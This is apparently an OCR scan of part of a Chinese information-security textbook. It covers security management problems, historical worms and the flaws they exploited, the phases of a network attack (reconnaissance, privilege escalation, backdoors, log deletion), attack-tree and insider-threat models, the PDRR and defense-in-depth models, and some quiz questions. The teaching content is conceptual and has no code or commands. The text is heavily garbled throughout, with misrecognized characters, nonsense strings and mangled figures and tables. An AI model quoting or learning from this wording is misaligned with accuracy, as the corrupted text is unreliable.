化 的 流行 ,大 批 青年 在 思想 碰撞 的 年 代 中 埋 下 了 对 于 自由 的 渴求 。 伴 随 新 技术 的 发 展 ,计算 
机 固定 运行 模式 已 无 法 阻拦 计算 机 极 客 们 的 奇 思 妙 想 。 一 批 热 爱 计 算 机 技术 、 热 囊 于 人 研究 
镶 能 计算 机 安全 系统 的 专家 竹 生 了 ,他们 就 是 黑客 。 

黑客 群体 中 也 有 善 恶 之 分 。 人 们 将 对 信息 系统 进行 恶意 攻击 破坏 .肆意 散播 病毒 .实施 
商业 间谍 活动 的 黑客 人 群 称 为 “ 黑 帽 子 ”; 以 打破 常规 设计 新 系统 、 精 人 研 技 术 、 田 于 创新 的 黑 
客人 和 群 被 称 为 “日 帽子 ” ,他们 是 行业 内 的 创新 者 ;: 而 介 于 两 者 之 间 , 以 破坏 已 有 系统 、 发 现 
汤 洞 为 工作 目标 的 人 群 则 被 称 为 * 灰 帽子 ”。 


1.3 信息 安全 问题 


1.3.1 安全 管理 问题 分 析 


(1) 安全 岗位 设置 和 安全 管理 策略 实施 难题 。 根 据 安 全 原则 ,一 个 系统 应 该 设置 多 个 
人 员 来 共同 负责 管理 ,但 是 受 成 本 、 技 术 等 条 件 限制 ,一 个 管理 员 既 要 负责 系统 的 配置 ,又 要 
负责 系统 的 安全 管理 、 安 全 设置 和 安全 审计 ,这 种 情况 使 得 安全 权限 过 于 集中 ,一 旦 管理 员 
的 权限 被 人 控制 , 极 易 导致 安全 失控 。 

(2) IT 产品 类 型 繁多 和 安全 管理 滞后 之 间 的 矛盾 。 目 前 ,信息 系统 部 署 了 众多 的 IT 
产品 ,包括 操作 系统 .数据库 平台 应 用 系统 。 但 是 不 同类 型 的 信息 产品 之 间 缺 乏 协同 ,特别 
是 不 同 厂商 的 产品 ,不 仅 产品 之 间 安全 管理 数据 缺乏 共享 ,而 且 各 种 安全 机 制 缺 乏 协 同 ,各 


全 产品 难以 管理 ,也 给 信息 系统 管理 留 下 安全 隐患 。 

(3) 大 型 组 织 中 的 身份 管理 与 访问 授权 。 据 2006 年 的 DTI 信 息 安 全 违反 调查 显示 OF 
均 每 5 家 大 企业 中 就 有 1 冢 由 于 身份 管理 问题 遭 党 安全 侵 磺 , 小 企业 要 稍微 好 一 些 。 可 见 ， 
号 份 管理 市 来 的 挑战 日 趋 严峻 。 虽 然 号 份 管理 并 不 是 一 个 新 问题 ,但 随 春 信息 安全 边界 的 
变化 ,号 份 管理 市 来 的 问题 越 来 越 严 重 。 例 如 ,如 何 解 决 用 户 号 份 统一 管理 ? 如 何 解决 移动 
ipfe fe HP £o Vo BUR 如 何 检查 1T 设备 过 从 公司 的 安全 柬 略 ,并 能 阻 断 
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不 合法 设备 访问 网 络 ? 如 何 保 证 访问 的 及 时 性 ,但 又 不 能 以 牺牲 安全 性 作为 代价 ? 

(4) 网 络 内 容 安 全 与 传统 管理 手段 沛 后 。 复 好 的 网 络 世 界 ,充斥 看 各 种 不 展 信 息 内 容 ， 
如 最 常见 的 垃圾 邮件 。 在 一 些 企 业 单位 中 ,网 络 的 带宽 资源 使 用 被 员工 用 来 在 线 聊 天 ,浏览 
新 闻 娱 乐 .股票 行情 、 色 情 网 站 ,这 些 网 络 活 动 严重 消耗 了 带宽 资源 ,导致 正常 业务 得 不 到 应 
有 的 资源 保障 。 但 是 ,传统 管理 手段 难以 适应 虚拟 世界 ,网 络 内 容 管理 手段 必须 改进 ,要 求 
能 做 到 “可 信和 ,可靠 \、 可 视 、 可 控 ”。 

(5) 业务 持续 运行 与 应 急 啊 应 管理 。CIO 杂志 和 普 华 永 道 的 报告 表明 ,IT 安全 是 亚洲 
企业 面临 的 重大 挑战 。 随 着 业务 数据 大 和 集中、 应 对 信息 服务 的 不 可 间断 性 ,以 及 攻击 事件 的 
不 可 预测 性 ,对 于 越 来 越 担忧 IT 风险 的 组 织 来 说 无 疑 是 一 大 挑战 ,需要 在 业务 运行 过 程 中 
考虑 ,如 何 建立 业务 持续 运行 安全 保障 机 制 ? 如 何 制 订 可 操作 性 的 应 急 啊 应 预案 ? 如 何 建 
立 低 成 本 的 灾 备 系统 ? 如 何 组 建 一 只 应 急 啊 应 队伍 ? 


1.3.2 信息 技术 环境 问题 分 析 


(1) 网 络 共享 与 恶意 代码 防 控 。 网 络 共享 促进 了 不 同 用 户 .不 同 部 门 .不 同 单位 之 间 的 
信息 交换 方便 ,但 是 ,恶意 代码 利用 信息 共享 网 络 环 境 扩散 ,其 影响 越 来 越 大 。 如 果 不 限制 
恶意 信息 的 交换 ， 将 导致 网 络 的 QoS 下降, 甚至 系统 将 痪 不 能 使 用 。 

(2) IT 产品 的 单一 性 和 大 规模 攻击 问题 。 信 息 系 统 中 软 便 件 产品 的 单一 性 ,如 同一 版 
本 的 OS. ,数据库 软 件 等 ,可 以 使 攻击 者 通过 软件 编程 ,实现 攻击 过 程 的 上 月 动 化 ,从 而 导致 大 
规模 网 络 安全 事件 时 有 发 生 , 如 网 络 晴 虫 .计算 机 病毒 “ 零 日 "攻击 等 安全 事件 。 

(3) IT 系统 的 复杂 性 和 漏洞 管理 。 多 协议 、 多 系统、 多 应 用 .多 用 户 组 成 的 网 络 环境 复 
杂 性 高 ,存在 难以 避免 的 安全 漏洞 。 据 SecurityFocus 公司 的 漏洞 统计 数据 表明 , 绝 大 部 分 
操作 系统 存在 安全 漏洞 。 巾 于 管理 .软件 工程 难度 等 问题 ,新 的 漏洞 不 断 地 引入 到 网 络 环境 
中 ,所 有 这 些 漏洞 都 将 可 能 成 为 攻击 切入 点 ,因此 攻击 者 可 以 利用 这 些 漏 洞 进 行人 侵 系 统 ， 
徊 取信 息 。 当 前 安全 漏洞 时 刻 威胁 大 网 络 信息 系统 的 安全 ,如 表 1-1 所 示 为 历年 重大 安全 
事件 与 安全 漏洞 的 相关 情况 统计 。 


X11 信息 安全 事件 与 安全 漏洞 相关 情况 统计 


时 间 安全 事件 名 称 所 利用 的 漏洞 


1988 年 Sendmail 及 finger 漏洞 

2000 年 分 布 式 拒绝 服务 攻击 TCP/IP 协议 漏洞 

2003 年 冲击 波 杀 手 蠕虫 微软 操作 系统 DCOM RPC 接口 远程 缓冲 区 溢出 漏洞 
2009 年 Conficker 蠕虫 微软 操作 系统 RPC 漏洞 

2016 年 Android 系统 Quadrooter 高 通 芯 片 多 线程 使 用 不 当 





2016 年 X RF AILS = MRR” 分 别 存 在 于 Safari Webkit iOS 内 核 ,iOS 内 核 损 坏 


为 了 解决 来 日 漏洞 的 攻击 ,一 般 通 过 打 补 丁 的 方式 来 增强 系统 安全 。 但 是 ,由 于 系统 运 
行 的 不 可 间断 性 及 漏洞 修补 风险 的 不 可 确定 性 ,即使 委 现 网 络 系统 存在 安全 潮 洞 ,系统 管理 
员 也 不 敢 轻 多 地 安放 外 丁 。 特 别 是 大 型 的 信息 系统 ,漏洞 修 钉 极为 困难 。 了 既 要 修补 漏洞 ,又 
要 能 够 保证 在 线 系统 的 正常 运行 。 汤 洞 管 理 成 为 信息 系统 安全 管理 的 难题 。 

(4) 网 络 攻击 突 发 性 和 防 泡 啊 应 廊 后 。 网 络 攻击 者 第 党 擎 握 主 动 权 , 而 防守 者 被 动 应 
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付 。 攻击 者 处 于 暗 处 ,而 攻击 目标 则 处 于 明 处 。 以 漏洞 的 传播 及 利用 为 例 ,攻击 者 往往 先 改 
现 系统 中 存在 的 漏洞 ,然后 开发 出 漏洞 攻击 工具 ,最 后 才 是 防守 者 提出 漏洞 安全 对 策 ， 

O 信息 系统 基础 设施 安全 威胁 急 增 。 网 络 攻击 目标 从 早期 的 以 UNIX 主机 系统 为 
主 ,逐步 转向 信息 系统 的 各 个 层面 上 。 特 别 是 最 近 两 年 来 ,针对 信息 系统 的 基础 设施 威胁 明 
显 增加 ,典型 的 威胁 有 ARP 病毒 ,域名 服务 器 攻击 .数据库 RootKit, DDoS 等 。 这 就 意味 着 
操作 系统 数据 库 和 网 络 协议 等 基础 设施 的 安全 越 来 越 重要 。 


1.3.3 信息 化 建设 问题 分 析 


(1) 信息 化 建设 超速 与 安全 规范 不 协调 。 网 络 安全 建设 缺乏 规范 操作 ,导致 信息 安全 
共享 难度 递增 , 留 下 安全 隐患 。 在 信息 化 建设 过 程 中 ,由 于 业务 急需 开通 , 通 当 的 做 法 是 “ 业 
务 优先 ,安全 徘 边 ”, 使 得 安全 建设 缺乏 规划 和 整体 设计 ,安全 建设 只 能 是 “ 亡 于 补 牢 ”, 出 了 
安全 事件 后 才 去 做 。 这 种 情况 ,在 企业 中 表现 得 更 为 突出 ,市 场 环境 的 动态 变化 ,使 得 业务 
坷 要 不 断 地 更 新 ,业务 变化 超过 了 现 有 安全 保障 能 力 。 

(2) IT 项 目 外 包 与 安全 隐患 防 控 。 一 个 组 织 基 于 多 方面 利益 考虑 ,往往 将 TT HUE AP 
包 给 条 公司 来 做 ,但 是 缺乏 有 效 的 安全 监 官 。 典 型 的 情况 是 初期 午 视 安全 ,后 来 在 项 目 开发 
的 压力 下 , 逻 渐 淡 深 。 外 包 项 目 在 没有 经 过 严格 的 奈 量 控制 和 安全 测试 情况 下 ,就 将 开发 的 
系统 移交 和 投入 运行 。 外 包公 司 可 能 在 开发 系统 中 留 有 相关 的 后 1 门 。 


1.3.4 人 员 的 安全 培训 和 管理 问题 分 析 


OD 信息 系统 用 户 安 全 意识 差异 性 和 安全 整体 提高 困难 。 信 息 安 全 是 “三 分 技术 ,七 分 
管理 ” ,人员 的 信息 安全 意识 尤为 重要 。 目 前 , 音 过 人 存在" 重 产 品 、. 轻 服务 , 重 技术 、 轻 管理 , 重 
业务 、 轻 安全 "的 思想 “安全 就 是 安 衣 防火 二 ,安全 驶 是 安 狗 杀毒 软件 ”, 人 员 整 体 信 息 安 全 
意识 不 平衡 ,导致 一 些 安全 制度 或 安全 流程 流 于 形式 。 盘 型 的 场景 如 下 。 

场景 一 : 用 户 选 取 哗 口令 ,使 得 攻击 者 可 以 从 远程 耳 接 控制 主机 。 

场景 二 : 用 户 开放 过 多 网 络 服务 。 例 如 ,网 络 边 界 没有 过 滤 掉 恶意 数据 包 或 切断 网 络 
连接 ,允许 外 部 网 络 的 主机 直接 ping 内 部 网 主机 ,允许 建立 空 链接 。 

场景 三 : FAP BERE sim. 

场景 四 : 用 户 百 接 利用 三 家 默认 配置 。 

场景 五 : 用 户 泄露 网 络 安全 敏感 信息 ,如 DNS 服务 配置 信息 。 

(20 口令 安全 设置 和 口令 多 记性 难题 。 在 一 个 网 络 系 统 中 ,每 个 网 络 服务 或 系统 部 要 
求 不 同 的 认证 方式 ,用 户 需要 记忆 多 个 口令 , 据 估算 ,用 户 平均 至 少 需要 4 个 口令 ,特别 是 系 
统管 理 员 ,需要 记 住 的 口令 就 更 多 ,如 开机 口令 、 系 统 进入 口令 、 数 据 库 口令 、 邮 件 口令 、 
Telnet H$ FTP 口令 、 路 由 器 口令 、 交 换 机 口令 等 。 按 照 安 全 原则 ,口令 设置 要 求 不 仅 复 
杂 , 而 且 口 令 长 度 要 足够 长 ,但 是 口令 复杂 则 不 容易 记 住 ,因此 ,用 户 选 择 口 令 只 好 用 简单 
的 .重复 使 用 的 口令 ,以 便于 保管 ,这 样 一 来 攻击 痢 只 要 猜测 到 某 个 用 户 的 口令 ,就 极 有 可 能 
引发 系列 口令 泄露 事件 。 据 调研 机 构 Nucleus Research 和 Knowledge Storm 的 调查 结果 
显示 ,企业 通常 会 通过 频繁 更 换 密码 或 增加 密码 位 数 来 确保 计算 机 安全 。 但 是 ,有 1/3 的 雇 
员 会 将 密码 写 在 纸 上 、 以 文本 文件 保存 在 计算 机 中 ,或 者 储存 在 手机 中 ,这 给 计算 机 安全 市 
来 了 潜在 威胁 。 对 此 ,Nucleus Research & 247 #7 I David O'Connell 称 :“ 这 就 好 比 父 母 
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情况 下 访问 数据 、 员 工 获 取 或 滥用 机 密 信息 ,甚至 是 内 外 人 员 勾 结 , 利 用 内 部 网 络 系统 的 漏 
洞 实 施 诈骗 或 攻击 。 目 前 ,员工 访问 机 密 信 息 市 来 内 部 威胁 的 频率 持续 在 高 位 。 一 些 针 对 
人 性 昱 点 的 攻击 手段 不 断 出 现 , 如 网 络 钓鱼 、 间 诛 软 件 . 击 键 记 录 。 在 这 种 情 次 下 , 击 要 解决 
确保 内 部 用 户 最 小 化 授权 ,同时 能 有 效 监 管 非 正 第 的 访问 行为 ; 需要 保护 机 密 信 息 ,防止 间 
诛 软 件 渗透 到 内 部 网 络 中 ; 需要 管理 种 三 方 人 员 的 访问 授权 以 监控 其 恶意 行为 。 


1.4 信息 安全 观 发 展 


1. 通信 保密 阶段 

在 这 一 阶段 ,关注 信息 安全 的 对 象 包括 车 方 和 政府 。 对 信息 安全 产生 威胁 的 方面 主要 
包括 搭 线 窃听 和 密码 学 分 析 。 通 信保 密 阶 段 对 信息 安全 的 认 知 ,主要 来 源 于 香农 的 著作 《 保 
密 系 统 的 通信 理论 》。 

2. 信息 安全 阶段 

随 看 计算 机 技术 的 发 展 及 互联 网 技术 的 普及 ,信息 安全 的 人 研究 范畴 包含 计算 机 安全 。 
根据 计算 机 体系 结构 ,对 计算 机 安全 的 研究 内 容 包 括 操作 系统 安全 数据库 安全 、 网 络 安 全 
3 个 方面 。 

3. 信息 保障 阶段 

随 着 技术 的 发 展 , 对 于 信息 安全 的 需求 已 不 仅 限 于 信息 的 完整 性 、 保 密 性 .可 用 性 。 新 
时 代 对 于 信息 安全 的 需求 需 关 注 到 信息 保障 。 美 国 国防 部 于 1996 年 在 国防 部 令 S-3600. 1 
给 出 信息 保障 的 定义 : 保护 和 防御 信息 及 信息 系统 ,确保 其 可 用 性 、 完 整 性 .保密 性 、 鉴别 、 
不 可 否认 性 等 特性 。 这 包括 在 信息 系统 中 融入 保护 、 检 测 、 反 应 功能 ,并 提供 信息 系统 的 恢 
复 功 能 。 在 实施 信息 安全 保障 过 程 中 ,一 般 需 包括 4 个 环节 ,分 别 是 保护 检测、 反应 和 恢复 。 

使 用 工程 化 方法 .应急 啊 应 方法 .风险 管理 方法 .可 生存 性 方法 可 达到 实现 信息 安全 保 
障 的 目的 。 工 程 化 方法 旨 在 将 工程 流程 融入 到 信息 安全 实施 中 ,将 信息 安全 工作 流程 对 应 
工程 的 4 个 阶段 ,分 别 为 设计 与 规划 、 安 全 实施 .安全 运 维 和 安全 评估 。 应 急 啊 应 方法 保障 
信息 安全 ,主要 体现 在 对 应 急事 件 的 处 理 流 程 ,包括 对 应 急事 件 预 防 、 发 现 .控制 .根除 .恢复 
TIR Ex Ab JE 6 个 阶段 ,最 终 实 现 对 应 急事 件 从 无 到 有 、 从 小 到 大 、 从 弦 到 强 、 从 点 到 面 的 及 时 
响应 。 风 险 管理 方法 主要 在 系统 设计 过 程 中 ,对 已 有 威胁 进行 评估 ,进而 判断 某 类 风险 对 信 
上 奶 保 障 系 统 的 影响 程度 。 可 生存 性 方法 是 指 在 系统 遭受 攻击 、 出 现 故 障 或 发 生意 外 事故 时 ， 
系统 能 及 时 完成 任务 的 能 力 ,主要 包括 抵抗 攻击 能 力 、 可 识别 能 力 和 可 恢复 能 力 。 


本 草 自 先 介 绍 网 络 安 全 现状 ,包括 当代 网 络 信息 战 的 发 展 和 网 络 威胁 的 变化 ; 接 看 介 


绍 了 新 时 代 网 络 安全 的 发 展 ; 随后 分 析 了 当代 信息 安全 方面 存在 的 问题 ; 最 后 介绍 了 近年 
来 信息 安全 行业 的 变化 与 发 展 。 
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>) el 1 


l. 


M 


当代 网 络 信 息 战 的 关注 焦点 包括 (  ”)。 

. 信息 日 由 与 国家 安全 之 间 和 存在 密切 联系 

互联 网 的 开放 性 与 信息 有 效 管理 之 间 存 在 矛盾 
Bt De AS ALB ef thet FF EA? JA 

信息 安全 技术 与 保密 制度 不 均衡 


1 


99» > 


. 下 列 各 项 中 不 属于 当代 网 络 攻 击 特点 的 是 ( Es 


A. 拒绝 服务 攻击 频繁 发 生 

D. 攻击 者 需要 的 技术 水 平 逐 渐 降 低 ,攻击 工 具 发 展 迅速 
C. 漏洞 发 现时 间 加 快 ,攻击 时 间 变 短 

D. 安全 从 业 人 员 数 目 较 少 


. MRE REA IAC D). 


A. 由 于 新 技术 导致 新 的 安全 风险 B. 关键 基础 设施 成 为 攻击 目标 
C. 非 国 家 行为 体 发 动 攻击 行为 D. 网 络 犯罪 更 加 猩 铬 


. 现代 网 络 有 哪些 安全 威胁 ? 

. 第 见 的 信息 安全 问题 都 有 哪些 ? 

. 请 列举 由 于 管理 不 当 引 发 的 系统 信息 安全 问题 。 
， 请 列举 几 个 第 见 的 安全 漏洞 ,并 介绍 漏洞 的 原理 。 
. 请 简 述 信息 安全 发 展 观 的 演变 过 程 。 


网 络 攻击 过 程 久 攻防 模型 9238 


2.1 典型 网 络 攻击 过 程 


2.1.1 网 络 攻 击 阶 段 


网 络 攻 击 通 常 可 以 划分 为 3 个 阶段 , 即 预 攻击 阶段 、 攻 击 阶 段 和 后 攻击 
阶段 。 攻 击 者 在 预 攻 击 阶段 收集 攻击 目标 信息 ,以 便 设 计 下 一 步 的 攻击 决 
案 。 预 攻击 阶段 收集 的 攻击 目标 包括 域名 及 IP 分 布 、 网 络 拓 扑 及 OS. i A 
及 服务 .应 用 系统 情况 和 对 应 漏洞 发 布 等 信息 。 

在 获取 了 攻击 目标 的 基本 信息 后 ,攻击 者 对 其 展开 攻击 行为 , 则 在 通过 
攻击 获取 一 定 的 系统 权限 。 攻 击 内 容 包 括 获 取 系 统 远程 控制 权限 、 进 入 远程 
系统 、 提 升 本 地 权限 .进一步 扩展 权限 和 对 系统 进行 实质 性 操作 。 

在 实施 完成 攻击 行为 后 ,攻击 者 需 消 除 攻击 痕迹 ,并 通过 植 人 木马 的 方式 
进入 潜伏 状态 维持 对 系统 的 控制 权限 。 通 常 通过 删除 日 志 、 修 补 明显 漏洞 的 方 
式 消 除 攻击 痕迹 。 网 络 攻击 3 个 阶段 的 主要 目的 与 攻击 内 容 如 图 2-1 所 示 。 


预 攻击 攻击 后 攻击 

目的 : 收集 信息 ， 进 行进 目的 : 进行 攻击 ， 获 取 系 目的 : 消除 痕迹 ， 长 期 维 
一 步 攻击 块 束 。 统 的 一 定 权 限 。 皖 一 定 的 控制 权限 。 

VITE: 获得 域名 及 IP 分 布 ， 内 容 : 获取 远程 控制 权限 ， 内 容 : 删除 日 将 ， 修 补 明 
获得 网 络 拓扑 及 OS， 多 得 进入 远程 系统 ， 提 升 本 地 TIR. EAE IAS. 
dima TAH AS. REEL 权限 ， 进 一 步 扩展 权限 ， 进一步 渗透 扩展 进入 洪 休 
Slr WES USE Z2 fi o 进行 实质 性 操作 。 状态 。 


图 2-1 网 络 攻击 阶段 


2.1.2 网 络 攻击 流程 
负 见 的 网 络 攻击 流程 如 图 2-2 所 示 , 攻 击 者 在 实施 攻击 行为 前 党 隐 着 日 
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号 信息 , 预 攻击 过 程 中 实施 信息 的 搜集 ,在 对 攻击 目标 的 操作 系统 及 系统 漏洞 进行 分 析 
后 ,选择 最 简单 的 方式 实施 攻击 ,攻击 成 功 后 获取 一 定 的 系统 权限 ,进一步 实现 攻击 直至 
获取 系统 最 高 权限 ,在 系统 中 安装 多 个 后 门 以 便 再 次 实施 攻击 行为 ,最 终 清除 入 侵 猴 迹 。 
通过 攻击 茶 个 目标 可 获取 相关 敏感 信息 ,也 可 将 本 次 攻击 目标 作为 下 次 攻击 其 他 系统 的 
跳板 。 





攻击 其 他 系统 


图 2-2 常见 的 网 络 攻击 流程 


在 网 络 攻击 基本 过 程 中 ,攻击 者 通过 借助 “跳板 机 ”使 用 免费 的 应 用 网 关 、 伪 造 IP 地 址 
和 MAC 地 址 .假冒 用 户 账 户 等 方式 隐藏 日 身 信 息 和 攻击 主机 位 置 ,使 得 系统 管理 员 无 法 对 
攻击 主机 进行 追踪 。 除 此 之 外 ,在 攻击 过 程 中 , 需 对 人 侵 行踪 进 行 隐蔽 ,避免 被 安全 管理 员 
发 现 或 被 攻击 检测 工具 发 现 。 攻 击 者 通常 通过 连接 隐藏 .进程 隐藏 .删除 审计 信息 或 停止 审 
计 服 务 进 程 .干扰 IDS 或 改变 系统 时 间 的 方法 隐藏 行踪 。 在 攻击 完成 后 ,通过 修改 或 清空 
日 志 审 计 记 录 , 删 除 实施 攻击 留 在 系统 中 的 相关 文件 ,隐藏 植 人 文件 的 方式 切断 攻击 追 
VA BE. 

在 目标 信息 收集 过 程 中 ,攻击 者 通过 端口 扫描 可 获得 服务 信息 ,也 可 通过 枚 举 用 户 账号 
ne 达到 收集 信息 的 目的 。 利 用 收集 的 信息 ,可 分 析 获 取 其 中 有 价值 的 内 容 ,进而 找寻 系统 

安全 的 脆弱 点 ,将 其 脆弱 点 视 为 潜在 攻击 的 入 口 。 第 见 的 扫描 更 包括 NMAP,X-SCAN, 
SHADOW SCAN,CIS,SUPERSCAN 和 HOLESCAN 4, 

在 攻击 过 程 中 通常 需要 利用 系统 已 存在 的 弱点 对 其 实施 攻击 ,进而 可 以 进入 目标 系统 。 
利用 网 络 上 固有 的 或 配置 上 的 漏洞 ,试图 从 目标 系统 上 取 回 重要 信息 ,或 者 在 上 面 执行 命 
4. AA SS 12:48 71 GAVE BO 7S JT 85 px AH P. .查询 匹配 弱点 的 网 页 或 使 用 弱 口 令 字 
WE, 

对 于 攻击 者 而 言 ,攻击 的 最 终 目标 在 于 获取 超级 用 户 权 限 , 实 现 对 目标 系统 的 绝对 控 
制 。 使 用 的 方法 包括 破解 系统 口令 .利用 已 有 系统 漏洞 \, 利 用 系统 中 运行 应 用 程序 的 漏洞 、 
利用 网 络 协议 漏洞 等 。 

实施 攻击 是 攻击 流程 中 的 核心 阶段 ,实施 的 攻击 主要 包括 进行 非法 活动 或 以 目标 系统 
为 跳板 器 其 他 系统 发 起 新 的 攻击 。 攻 击 手段 包括 甸 听 敏感 数据 、 停 止 网 络 服务 、 下 和 载 敏感 数 
据 、 修 改 或 删除 用 户 账 吕 .修改 或 删除 数据 记录 等 方式 。 

在 进行 完成 一 次 攻击 后 ,为 方便 人 侵 者 以 后 进入 系统 ,通常 入 侵 者 会 通过 添加 超级 用 
P! , 植 人 特洛伊 木马 ,局 动 存在 安全 隐患 的 网 络 服务 ,放宽 文件 许可 权 , 修 改 系 统 配置 文件 ， 
建立 秘密 传输 通道 的 方式 开辟 后 门 。 
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2.2 网 络 攻 击 模型 


1. Cyber-Terrorist 攻击 模型 

GreggSchude 和 BradleyWood 根据 RedTeam 的 研究 数据 ,提出 了 赛 博 恐怖 分 子 
(Cyber-Terrorist) 的 行为 过 程 模型 ,这 个 模型 从 策略 、 拥 有 资源 、 上 有 具备 乔 力 、 风 险 接 受 度 , 特 
定 攻 击 目 标 、 攻 击 过 程 等 角度 来 刻画 赛 博 您 怖 分 子 模型 。 此 模型 由 情报 收集 、 计 划 准 备 \ 目 
标 网 络 发 现 、 测 试 实验 、 风 险 判 断 、 攻 击 执行 、 破 坏 效 果 评 佑 组 成 。 但 是 侧重 于 揪 述 攻击 决 
策 , 而 就 攻击 操作 行为 执行 实际 情况 不 能 体现 出 来 。 虽 然 赛 博 您 怖 分 子 是 假设 存在 的 ,目前 
还 不 能 确定 美国 DARPA 投入 经 费 进 行 研究 。Bradley J. Wood 提出 内 部 威胁 模型 (Insider 
Threat Model) ,此 模型 摘 述 内 部 威胁 着 属性 ,包括 访问 (Access) , AU (Knowledge) ,特权 
(Privilege) 、 拉 巧 (Skill) 、 XU (Risk), WE (Tactics), 2 PL (Motivation) Al 4 FR (Process), 
内 部 威胁 者 粗略 模型 ,认为 此 模型 由 人 ,工具 环境 三 部 分 组 成 ,包含 以 下 4 个 基本 元 系 。 

(1) WMR: 用 于 模型 测量 。 

(2) 轮廓 元 素 : 定义 人 、 工具、 环境 的 框架 。 

(3) 行为 元 素 : 定义 特征 、 属性、 关系。 

(4) F(X): 定义 模型 的 功能 。 

此 模型 的 开发 意图 就 是 用 于 预测 、 检 测 、 啊 应 、 报 警 、 策 略 开 发 .教育 培训 等 。 美 国 的 
OARPA 的 系统 保障 方法 采用 了 CARO 模型 ,此 模型 从 目标 (Objectives)、 风 险 (Risk)、 能 
Fi (Capability) .访问 (Access) 等 角度 来 描述 网 络 敌手 的 特征 ; 而 James K. Williams 通过 调 
换 CARO 模型 的 顺序 ,提出 ORCA 网 络 政 手 模型 。 

2. Red Team 模型 

Read Team 模型 主要 使 用 攻击 树 方 法 ,而 攻击 树 方法 起 源 于 故障 树 方法 。 故 障 树 方法 
主要 用 于 进行 系统 风险 分 析 和 系统 可 徘 性 分 析 , 后 扩展 为 软件 故障 树 , 用 于 辅助 识别 软件 设 
计 和 实现 中 的 错误 ,并 被 成 功 地 用 在 IDS 技术 上 。 

Schneier 首先 基于 软件 故障 树 方法 提出 了 攻击 树 的 概念 。 在 这 一 方法 上 ,AND-OR JÉ 
式 的 树 结 构 被 用 来 建 模 网 络 脆弱 性 ,分析 攻击 行为 。 攻 击 树 方法 可 以 被 Red Team 用 来 进 
行 次 透 测试 ,同时 也 可 以 被 Blue Team 用 来 研究 防御 机 制 。 

攻击 树 的 优点 : 

C1) 能 够 来 取 专 冢 头脑 风 桑 法, 并且 将 这 些 意见 融合 到 攻击 树 中 ; 

(2) 能 够 进行 费 效 分 析 或 概率 分 析 ; 

(3) 能 够 建 模 非 党 复杂 的 攻击 场景 。 


攻击 树 的 缺点 : 
(1) 由 于 树 绪 构 的 内 在 限制 ,攻击 树 不 能 用 来 建 模 多 重 符 试 攻击 .时 间 依 赖 及 访问 控制 
等 场景 ; 


(2) 不 能 用 来 建 模 循环 事件 ; 
C3) 对 于 现实 中 的 大 规模 网 络 , 攻 击 树 方 法 处 理 起 来 将 会 特别 复杂 。 
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2.3 网 络 防 护 模型 


1. PDRR 模型 

PDRR 模型 是 一 个 最 常用 的 网 络 安全 模型 。PDRR 就 是 4 个 英文 单词 的 第 一 个 字母 : 
Protection( 防 护 ) Detection( 检 测 )、Response( 啊 应 ) 和 Recovery( 恢 复 )。 这 4 个 部 分 组 成 
了 一 个 动态 的 信息 网 络 周 期 ,如 图 2-3 所 示 。 





防护 (P) 





KH) | 





II NR) 





图 2-3 PDRR 模型 


安全 策略 的 每 一 部 分 都 包括 一 组 安全 单元 来 实施 一 定 的 安全 功能 。 防 护 作 为 安全 策略 
的 第 一 条 战线 ,其 功能 就 是 对 系统 可 能 存在 的 安全 问题 采取 合理 的 网 络 安全 技术 ,以 进行 被 
动 或 主动 的 防御 。 检 测 是 安全 策略 的 第 二 条 战线 ,用 以 检测 人 侵 者 的 身份 。 一 旦 检测 出 人 
侵 . Us] Jr FR S SL JT us s] JA. ,包括 紧急 啊 应 和 其 他 业务 处 理 。 安 全 策略 的 最 后 一 条 战线 就 是 进 
行 系统 恢复 ,把 系统 恢复 到 原来 的 正 背 运作 状态 。 巾 此 可 见 , 安 全 策略 是 由 防御 .检测 、. 啊 应 
与 恢复 组 成 的 一 个 动态 的 安全 周期 。 下 面 介 绍 PDRR 模型 的 4 个 部 分 。 

(1) 保护 。 通 过 传统 的 静态 安全 技术 和 方法 可 用 来 实现 保护 的 环节 ,包括 系统 加 固 、 防 
火 墙 加密 机 制 .访问 控制 和 认证 等 。 

(2) 检测 。 检 测 在 PORR 模型 中 占据 着 重要 的 地 位 , 它 是 动态 啊 应 和 进一步 加 强 保 护 
的 依据 ,也 是 强制 落实 安全 策略 的 有 力 工 具 。 只 有 检测 和 监控 信息 系统 (通过 漏洞 扫描 和 人 
侵 检 测 等 手段 ) ,及 时 发 现 新 的 威胁 和 漏洞 ,才能 在 循环 反馈 中 作出 有 将 的 啊 应 。 

(3) 啊 应 。 啊 应 和 检测 环节 是 紧密 关联 的 ,只 有 对 检测 中 发 现 的 问题 作出 及 时 有 效 的 
处 理 , 才 能 将 信息 系统 迅速 调整 到 新 的 安全 状态 ,或 者 称 为 最 低 风 险 状 态 。 

(4) 恢复 。 恢 复 环 节 对 于 信息 系统 和 业务 活动 的 生存 起 着 至 关 重 要 的 作用 ,组 织 只 有 
建立 并 采用 完善 的 恢复 计划 和 机 制 ,其 信息 系统 才能 在 重大 灾难 事件 中 尽快 恢复 并 延续 
业务 。 

2. 纵深 防护 模型 

在 PDRR 模型 中 ,纵深 防御 (Defense in Depth) 的 思想 体现 得 并 不 突出 ,首先 介绍 纵深 
防御 的 概念 。 纵 深 防 御 思 想 是 近年 来 发 展 起 来 的 一 个 轿 新 的 安全 思想 , 它 从 各 个 层面 中 ( 包 
括 主机 、 网 络 、 系 统 边 界 和 支撑 性 基础 设施 等 ) ,根据 信息 资产 保护 的 不 同等 级 来 保障 信息 与 
信息 系统 的 安全 ,实现 预警 .保护 ,检测 . 啊 应 和 恢复 这 5 个 安全 内 容 。 

纵深 防御 体系 就 是 将 分 散 系 统 整合 成 一 个 异 构 网 络 系统 ,基于 联动 联防 和 网 络 集 中 管 
BE .监控 技术 ,将 所 有 信息 安全 和 数据 安全 产品 有 机 地 结合 在 一 起 ,在 漏洞 预防 .攻击 处 理 、 
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破坏 修复 3 个 方面 给 用 户 提供 整体 的 解决 方案 ,能 够 极 大 地 提高 系统 防护 效果 ,降低 网 络 管 
理 的 风险 和 复杂 性 。 同 时 由 于 黑客 攻击 的 方式 具有 高 技巧 性 ,分 散 性 、 随 机 性 和 局 部 持续 性 
的 特点 ,因此 即使 是 多 层面 的 安全 防御 体系 ,如 果 是 静态 的 ,也 无 法 抵御 来 自 外 部 和 内 部 的 
攻击 ,只 有 将 众多 的 攻击 手法 进行 搜集 、 归 类 人 分析、 消化、 综合 ,将 其 体系 化 , 才 有 可 能 使 防 
御 系 统 与 之 相 匹 配 、 相 融合 ,以 自动 适应 攻击 的 变化 ,从 而 形成 动态 的 安全 防御 体系 。 

